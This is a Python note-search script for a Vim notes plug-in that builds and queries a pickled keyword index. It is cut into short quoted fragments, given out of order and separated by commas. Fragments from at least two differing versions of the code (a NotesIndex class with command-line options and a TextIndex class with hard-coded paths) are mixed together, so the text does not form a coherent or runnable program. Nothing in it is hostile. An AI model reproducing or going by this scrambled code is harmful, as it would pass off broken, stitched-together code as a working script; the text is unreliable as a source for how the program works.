self.index['version']", "{}, 'files': {}, 'version': INDEX_VERSION} else: return index class TextIndex: def __init__(self, index_location:", "list of normalized, unique keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE)", "substring in normalized_kw: if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else:", "# URL: http://peterodding.com/code/vim/notes/ # License: MIT # # This Python script can be", "normalized_db_kw in normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is None: matches", "{'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to", "to load index from file!\", exc_info=True) return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}", "filename, last_modified): \"\"\"Add a note to the index (assumes the note is not", "if self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\", global_timer) else:", "matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\", global_timer) def", "# Define the command line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/']", "filename) else: # Check whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename]", "= [(k, k.lower()) for k in index['keywords']] for word in needles: submatches =", "# - Hundreds of notes can be searched in less than a second.", "in re.findall(r'\\w+', text, re.UNICODE): word = word.strip() if word != '' and not", "%s ..\", index_location) with open(index_location, 'rb') as handle: index = pickle.load(handle) logger.debug(\"Format version", "'--notes'): self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding = arg elif opt in", "-h, --help show this message and exit For more information see http://peterodding.com/code/vim/notes/ \"\"\"", "\"Incompatible index format detected!\" logger.debug(\"Loaded %i notes from index in %s\", len(index['files']), load_timer)", "keyword index on disk. # # Author: <NAME> <<EMAIL>> # Last Change: November", "False self.dirty = False logger.debug(\"Loaded %i notes from index in %s\", len(self.index['files']), load_timer)", "opt, arg in opts: if opt in ('-i', '--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling", "Already checked this note, we can forget about it. del notes_on_disk[filename] # Add", "'~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive = True self.keyword_filter = None", "notes: # # - Very large notes don't slow searching down so much;", "def update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\" update_timer =", "True def search_index(self, keywords): \"\"\"Return names of files containing all of the given", "else [] def list_keywords(self, substring, limit=25): \"\"\"Print all (matching) keywords to standard output.\"\"\"", "self.case_sensitive else keyword.lower() def encode(self, text): \"\"\"Encode a string in the user's preferred", "= word.strip() if word != '' and not word.isspace() and len(word) >= 2:", "should rebuild the index. INDEX_VERSION = 3 # Filename matching patterns of files", "using a full text index, updated automatically during each invocation of the program.", "in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'): self.usage() sys.exit(0) else: assert", "internal :vimgrep command to search all of the user's notes: # # -", "handle: for kw in self.tokenize(handle.read()): if kw not in self.index['keywords']: self.index['keywords'][kw] = [filename]", "== INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded %i notes from index in %s\",", "during each invocation of the program. Valid options include: -i, --ignore-case ignore case", "search_index(self, keywords): \"\"\"Return names of files containing all of the given keywords.\"\"\" matches", "INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger =", "text): \"\"\"Encode a string in the user's preferred character encoding.\"\"\" if isinstance(text, str):", "text = self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE): word = word.strip() if", "filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in %s ..\", len(notes_on_disk) - last_count,", "protocol makes sure repeating strings are stored only # once, so it's not", "last_modified) logger.info(\"Updated index in %s\", update_timer) def add_note(self, filename, last_modified): \"\"\"Add a note", "for k in self.index['keywords']] for usr_kw in keywords: submatches = set() for original_db_kw,", "from index in %s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load index from", "'--database'): self.database_file = arg elif opt in ('-n', '--notes'): self.user_directories.append(arg) elif opt in", "INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer = Timer()", "the keyword index by scanning the notes directory.\"\"\" update_timer = Timer() # First", "load index from file!\", exc_info=True) self.first_use = True self.dirty = True self.index =", "disk. notes_on_disk = {} last_count = 0 for directory in self.user_directories: print('Scanning', directory)", "tokenize(self, text): \"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\" words", "with open(filename, encoding='utf-8') as handle: for kw in self.tokenize(handle.read()): if kw not in", "normalized_kw = self.normalize(kw) if substring in normalized_kw: if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw,", "0 for directory in user_directories: for root, dirs, files in os.walk(directory): for filename", "matches = None normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw", "\"Incompatible index format detected!\" self.first_use = False self.dirty = False logger.debug(\"Loaded %i notes", "the index. If # I really have to I'll probably come up with", "search all of the user's notes: # # - Very large notes don't", "keyword searches in the user's notes. It has two advantages over just #", "..\", self.database_file) with open(self.database_file, 'rb') as handle: self.index = pickle.load(handle) logger.debug(\"Format version of", "os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index", "to disk in %s\", save_timer) def update_index(self): \"\"\"Update the keyword index by scanning", "for k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword index or start", "-i, --ignore-case ignore case of keyword(s) -l, --list=SUBSTR list keywords matching substring -d,", "total of %i notes ..\", len(notes_on_disk)) # Check for updated and/or deleted notes", "as error: print(str(error)) self.usage() sys.exit(2) # Define the command line option defaults. self.database_file", "first sight :-). # # For more information about the Vim plug-in see", "check validity. self.database_file = self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for d in self.user_directories if", "for original_db_kw, normalized_db_kw in normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is", "a string into a list of normalized, unique keywords.\"\"\" words = set() text", "if self.dirty: self.save_index() if self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in", "\"\"\"Delete a note from given index.\"\"\" logger.info(\"Deleting file from index: %s\", filename) del", "print('listing keywords') decorated = [] substring = self.normalize(substring) for kw, filenames in self.index['keywords'].items():", "not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) self.index['files'][filename] = last_modified with", "len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load index from file!\", exc_info=True) return {'keywords':", "directory in user_directories: for root, dirs, files in os.walk(directory): for filename in files:", "keyword arguments. return [self.normalize(k) for k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the", "= Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if", "filename not in notes_on_disk: # Forget a deleted note. self.delete_note(filename) else: # Check", "quite # fast. Also the pickle protocol makes sure repeating strings are stored", "notes_directories self.index = load_index(self.index_location) def search(self, query: str) -> List[str]: \"\"\"Return names of", "matches else [] def update_index(self): \"\"\"Update the keyword index by scanning the notes", "from disk: %i\", index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded", "Forget a deleted note. self.delete_note_from_index(index, filename) else: # Check whether previously seen note", "if kw not in self.index['keywords']: self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename) self.dirty = True", "self.start_time = time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self):", "def search(self, query: str) -> List[str]: \"\"\"Return names of files containing all of", "new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index", "file searching using keyword index on disk. # # Author: <NAME> <<EMAIL>> #", "self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk) # Already checked this note, we can forget", "handle) logger.debug(\"Saved index to disk in %s\", save_timer) def update_index(self): \"\"\"Update the keyword", "# Check for updated and/or deleted notes since the last run? if not", "really it doesn't seem to be needed -- I have over # 850", "it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use timer", "Python script for fast text file searching using keyword index on disk. #", "if matches is None: matches = submatches else: matches &= submatches return sorted(matches)", "os.path.isdir(d)] # Return tokenized keyword arguments. return [self.normalize(k) for k in self.tokenize(' '.join(keywords))]", "not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\", global_timer) else: matches = self.search_index(keywords)", "> last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk) # Already checked this note, we", "keyword(s) -l, --list=SUBSTR list keywords matching substring -d, --database=FILE set path to keywords", "= [filename] else: self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename): \"\"\"Remove a note", "index: for filename in set(index['files'].keys()): if filename not in notes_on_disk: # Forget a", "Python script can be used by the notes.vim plug-in to perform fast #", "index file is found with an # unsupported version, the script knows that", "in notes_on_disk: # Forget a deleted note. self.delete_note_from_index(index, filename) else: # Check whether", "logger.debug(\"Saved index to disk in %s\", save_timer) def update_index(self): \"\"\"Update the keyword index", "sorted(matches) if matches else [] def update_index(self): \"\"\"Update the keyword index by scanning", "assert self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" self.first_use = False self.dirty =", "not in self.index['keywords']: self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self,", "but it's quite # fast. Also the pickle protocol makes sure repeating strings", "exc_info=True) return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} else: return index class TextIndex:", "is found with an # unsupported version, the script knows that it should", "on disk. notes_on_disk = {} last_count = 0 for directory in user_directories: for", "keywords index file -n, --notes=DIR set directory with user notes (can be repeated)", "notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) # TODO:", "search(self, query: str) -> List[str]: \"\"\"Return names of files containing all of the", "last run? if not self.first_use: for filename in self.index['files'].keys(): if filename not in", "# First we find the filenames and last modified times of the notes", "normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches &= submatches", "> last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already checked this note, we can forget", "normalize(self, keyword): \"\"\"Normalize the case of a keyword if configured to do so.\"\"\"", "if x != filename] self.dirty = True def search_index(self, keywords): \"\"\"Return names of", "keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help', ])", "Levenshtein = None # The version of the index format that's supported by", "('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'): self.usage() sys.exit(0) else: assert False,", "the keyword index or start with an empty one.\"\"\" try: load_timer = Timer()", "argv=None): \"\"\"Entry point to the notes search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv", "version of the index format that's supported by this revision of the #", "if os.path.isdir(d)] # Return tokenized keyword arguments. return [self.normalize(k) for k in self.tokenize('", "search_notes.py [OPTIONS] KEYWORD... Search one or more directories of plain text files using", "self.index['files'].keys(): if filename not in notes_on_disk: # Forget a deleted note. self.delete_note(filename) else:", "pickle # module. The structure of the dictionary may seem very naive but", "substring = self.normalize(substring) for kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring", "index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded %i notes from index in", "load_timer = Timer() logger.debug(\"Loading index from %s ..\", index_location) with open(index_location, 'rb') as", "encoding='utf-8') as handle: raw = handle.read() for kw in tokenize(raw): if kw not", "import pickle from typing import List, Set try: import Levenshtein except ImportError: Levenshtein", "for kw in index['keywords']: index['keywords'][kw] = [x for x in index['keywords'][kw] if x", "(about 8 MB) and 25000 keywords and it's plenty fast. if usr_kw in", "repeating strings are stored only # once, so it's not as bad as", "by scanning the notes directory.\"\"\" update_timer = Timer() # First we find the", "index['keywords'][kw] if x != filename] def tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize a", "options include: -i, --ignore-case ignore case of keyword(s) -l, --list=SUBSTR list keywords matching", "in ('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding = arg elif", "Add new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated", "last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk) # Already checked this note,", "text index, updated automatically during each invocation of the program. Valid options include:", "I really have to I'll probably come up with something more # efficient,", "notes.vim plug-in to perform fast # keyword searches in the user's notes. It", "['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive = True self.keyword_filter = None # Map command", "# Check whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db =", "in tokenize(raw): if kw not in index['keywords']: index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def", "opt in ('-d', '--database'): self.database_file = arg elif opt in ('-n', '--notes'): self.user_directories.append(arg)", "rebuild the index. INDEX_VERSION = 3 # Filename matching patterns of files to", "print('Searching index') index = load_index(INDEX_FILE_PATH) needles = query.split() matches = None normalized_db_keywords =", "= 0 for directory in user_directories: for root, dirs, files in os.walk(directory): for", "if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse", "# # The keyword index is a Python dictionary that's persisted using the", "keywords') decorated = [] substring = self.normalize(substring) for kw, filenames in self.index['keywords'].items(): normalized_kw", "== INDEX_VERSION, \"Incompatible index format detected!\" self.first_use = False self.dirty = False logger.debug(\"Loaded", "selection = [d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize", "limit=25): \"\"\"Print all (matching) keywords to standard output.\"\"\" print('listing keywords') decorated = []", "since the last run? if index: for filename in set(index['files'].keys()): if filename not", "not None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames, check validity. self.database_file = self.munge_path(self.database_file)", "case of keyword(s) -l, --list=SUBSTR list keywords matching substring -d, --database=FILE set path", "delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing file from index: %s\",", "file from index: %s\", filename) del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] =", "of long during operations.\"\"\" def __init__(self): self.start_time = time.time() def __str__(self): return \"%.2f", "%s\", filename) index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: raw = handle.read()", "# Last Change: November 1, 2015 # URL: http://peterodding.com/code/vim/notes/ # License: MIT #", "run? if index: for filename in set(index['files'].keys()): if filename not in notes_on_disk: #", "more directories of plain text files using a full text index, updated automatically", "matches &= submatches return list(matches) if matches else [] def list_keywords(self, substring, limit=25):", "if filename not in notes_on_disk: # Forget a deleted note. self.delete_note_from_index(index, filename) else:", "can be searched in less than a second. # # The keyword index", "over # 850 notes (about 8 MB) and 25000 keywords and it's plenty", "by the notes.vim plug-in to perform fast # keyword searches in the user's", "loaded from disk: %i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\"", "= self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] # Return", "'ignore') return text def munge_path(self, path): \"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return", "= self.normalize(substring) for kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in", "with open(filename, encoding='utf-8') as handle: raw = handle.read() for kw in tokenize(raw): if", "Last Change: November 1, 2015 # URL: http://peterodding.com/code/vim/notes/ # License: MIT # #", "True self.keyword_filter = None # Map command line options to variables. for opt,", "pathnames, check validity. self.database_file = self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for d in self.user_directories", "encode(self, text): \"\"\"Encode a string in the user's preferred character encoding.\"\"\" if isinstance(text,", "= 0 for directory in self.user_directories: print('Scanning', directory) for root, dirs, files in", "in files: if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS): abspath = os.path.join(root, filename)", "in the user's preferred character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding,", "note, we can forget about it. del notes_on_disk[filename] # Add new notes to", "index['keywords'][kw] = [x for x in index['keywords'][kw] if x != filename] def tokenize(self,", "perform fast # keyword searches in the user's notes. It has two advantages", "module. The structure of the dictionary may seem very naive but it's quite", "= len(notes_on_disk) logger.info(\"Found a total of %i notes ..\", len(notes_on_disk)) # Check for", "more noise -h, --help show this message and exit For more information see", "variables. for opt, arg in opts: if opt in ('-i', '--ignore-case'): self.case_sensitive =", "but really it doesn't seem to be needed -- I have over #", "= handle.read() for kw in tokenize(raw): if kw not in index['keywords']: index['keywords'][kw] =", "needles: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if word in normalized_db_kw:", "= False logger.debug(\"Disabling case sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower()", "over all keywords in the index. If # I really have to I'll", "searches in the user's notes. It has two advantages over just # using", "opt in ('-e', '--encoding'): self.character_encoding = arg elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG)", "# Add new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename,", "matches = None normalized_db_keywords = [(k, k.lower()) for k in index['keywords']] for word", "index: %s\", filename) index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: raw =", "the script knows that it should rebuild the index. INDEX_VERSION = 3 #", "last_count = len(notes_on_disk) logger.info(\"Found a total of %i notes ..\", len(notes_on_disk)) # Check", "the last run? if index: for filename in set(index['files'].keys()): if filename not in", "into a list of normalized, unique keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}',", "modified times of the notes on disk. notes_on_disk = {} last_count = 0", "matches = submatches else: matches &= submatches return sorted(matches) if matches else []", "last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a total of %i notes ..\", len(notes_on_disk))", "w in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()} def save_index(self, database_file: str, index):", "except Exception: logger.warn(\"Failed to load index from file!\", exc_info=True) self.first_use = True self.dirty", "if an existing index file is found with an # unsupported version, the", "handle.read() for kw in tokenize(raw): if kw not in index['keywords']: index['keywords'][kw] = [filename]", "index: %s\", filename) self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: for kw", "str, index): \"\"\"Save the keyword index to disk.\"\"\" with open(database_file, 'wb') as handle:", "last_modified): \"\"\"Add a note to the index (assumes the note is not already", "25000 keywords and it's plenty fast. if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches", "listing keywords in %s\", global_timer) else: matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished", "for updated and/or deleted notes since the last run? if not self.first_use: for", "arg elif opt in ('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding", "None: matches = submatches else: matches &= submatches return sorted(matches) if matches else", "the command line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=',", "self.user_directories if os.path.isdir(d)] # Return tokenized keyword arguments. return [self.normalize(k) for k in", "index (assumes the note is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\",", "def tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize a string into a list of", "filename) self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: for kw in self.tokenize(handle.read()):", "%i notes from index in %s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load", "track of long during operations.\"\"\" def __init__(self): self.start_time = time.time() def __str__(self): return", "keywords to standard output.\"\"\" print('listing keywords') decorated = [] substring = self.normalize(substring) for", "'rb') as handle: self.index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk:", "line options to variables. for opt, arg in opts: if opt in ('-i',", "return keyword if self.case_sensitive else keyword.lower() def encode(self, text): \"\"\"Encode a string in", "-> Set[str]: \"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\" return", "last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index,", "\"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing file from index: %s\", filename) del", "text): \"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\" words =", "index['keywords']] for word in needles: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords:", "the given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles = query.split() matches =", "list of normalized, unique keywords.\"\"\" words = set() text = self.decode(text) for word", "open(database_file, 'wb') as handle: pickle.dump(index, handle) class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point", "if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort()", "import re import sys import time import pickle from typing import List, Set", "dictionary may seem very naive but it's quite # fast. Also the pickle", "notes_on_disk[filename] # Add new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index,", "a list of normalized, unique keywords.\"\"\" words = set() text = self.decode(text) for", "of notes -v, --verbose make more noise -h, --help show this message and", "be used by the notes.vim plug-in to perform fast # keyword searches in", "tokenized keyword arguments. return [self.normalize(k) for k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load", "self.dirty: self.save_index() if self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\",", "and last modified times of the notes on disk. notes_on_disk = {} last_count", "os.path.getmtime(abspath) logger.info(\"Found %i notes in %s ..\", len(notes_on_disk) - last_count, directory) last_count =", "updated and/or deleted notes since the last run? if index: for filename in", "= True self.keyword_filter = None # Map command line options to variables. for", "update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\" update_timer = Timer()", "point to the notes search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:])", "the notes.vim plug-in to perform fast # keyword searches in the user's notes.", "self.index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already checked this note,", "elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'): self.usage() sys.exit(0)", "self.dirty = True self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def save_index(self):", "kw)) decorated.sort() selection = [d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self,", "Set[str]: \"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\" return {w.strip()", "index in %s\", update_timer) def add_note(self, filename, last_modified): \"\"\"Add a note to the", "configured to do so.\"\"\" return keyword if self.case_sensitive else keyword.lower() def encode(self, text):", "x != filename] def tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize a string into", "'wb') as handle: pickle.dump(index, handle) class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to", "so it's not as bad as it may appear at first sight :-).", "'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk in %s\", save_timer) def", "in self.index['files'].keys(): if filename not in notes_on_disk: # Forget a deleted note. self.delete_note(filename)", "query.split() matches = None normalized_db_keywords = [(k, k.lower()) for k in index['keywords']] for", "'--help'): self.usage() sys.exit(0) else: assert False, \"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes", "Change: November 1, 2015 # URL: http://peterodding.com/code/vim/notes/ # License: MIT # # This", "for filename in self.index['files'].keys(): if filename not in notes_on_disk: # Forget a deleted", "less than a second. # # The keyword index is a Python dictionary", "of files to ignore during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')]", "self.index['keywords']: self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename): \"\"\"Remove", "at first sight :-). # # For more information about the Vim plug-in", "of index loaded from disk: %i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index", "in normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is None: matches =", "from index in %s\", len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed to load index from", "Yes I'm using a nested for loop over all keywords in the index.", "python # Python script for fast text file searching using keyword index on", "original_db_kw, normalized_db_kw in normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is None:", "For more information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules. import codecs import", "program. Valid options include: -i, --ignore-case ignore case of keyword(s) -l, --list=SUBSTR list", "path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to", "and it's plenty fast. if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None:", "filename, last_modified) # TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index,", "= arg elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'):", "MIT # # This Python script can be used by the notes.vim plug-in", "keywords.\"\"\" words = set() text = self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE):", "%s\", filename) del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] = [x for x", "logger.warning(\"Failed to load index from file!\", exc_info=True) return {'keywords': {}, 'files': {}, 'version':", "http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules. import codecs import fnmatch import getopt import", "and/or deleted notes since the last run? if not self.first_use: for filename in", "a deleted note. self.delete_note_from_index(index, filename) else: # Check whether previously seen note has", "= notes_directories self.index = load_index(self.index_location) def search(self, query: str) -> List[str]: \"\"\"Return names", "necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add a note to the", "index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a note from", "Very large notes don't slow searching down so much; # - Hundreds of", "logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from", "= [] substring = self.normalize(substring) for kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw)", "notes_on_disk: # Forget a deleted note. self.delete_note_from_index(index, filename) else: # Check whether previously", "given index.\"\"\" logger.info(\"Deleting file from index: %s\", filename) del index['files'][filename] for kw in", "= False logger.debug(\"Loaded %i notes from index in %s\", len(self.index['files']), load_timer) except Exception:", "index_location self.notes_directories = notes_directories self.index = load_index(self.index_location) def search(self, query: str) -> List[str]:", "so much; # - Hundreds of notes can be searched in less than", ":vimgrep command to search all of the user's notes: # # - Very", "List, Set try: import Levenshtein except ImportError: Levenshtein = None # The version", "- Hundreds of notes can be searched in less than a second. #", "a list of normalized, unique keywords.\"\"\" return {w.strip() for w in re.findall(r'\\w{3,}', text,", "searched in less than a second. # # The keyword index is a", "self.delete_note(filename) else: # Check whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename]", "sys import time import pickle from typing import List, Set try: import Levenshtein", "command line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=',", "in keywords: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: # Yes I'm", "Timer() logger.debug(\"Loading index from %s ..\", self.database_file) with open(self.database_file, 'rb') as handle: self.index", "load_timer) except Exception: logger.warning(\"Failed to load index from file!\", exc_info=True) return {'keywords': {},", "notes directory.\"\"\" user_directories = self.notes_directories index = self.index # First we find the", "during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG)", "%s\", global_timer) def parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\" try: opts, keywords", "Timer: \"\"\"Easy to use timer to keep track of long during operations.\"\"\" def", "else: matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\", global_timer)", "keywords and it's plenty fast. if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is", "-> List[str]: \"\"\"Return names of files containing all of the given keywords.\"\"\" print('Searching", "\"%.2f seconds\" % self.elapsed_time @property def elapsed_time(self): return time.time() - self.start_time if __name__", "keyword if self.case_sensitive else keyword.lower() def encode(self, text): \"\"\"Encode a string in the", "self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive = True self.keyword_filter", "for directory in user_directories: for root, dirs, files in os.walk(directory): for filename in", "information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules. import codecs import fnmatch import", "last_modified) # TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename,", "to index. for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) # TODO: Only", "the # `search_notes.py' script; if an existing index file is found with an", "keyword index is a Python dictionary that's persisted using the pickle # 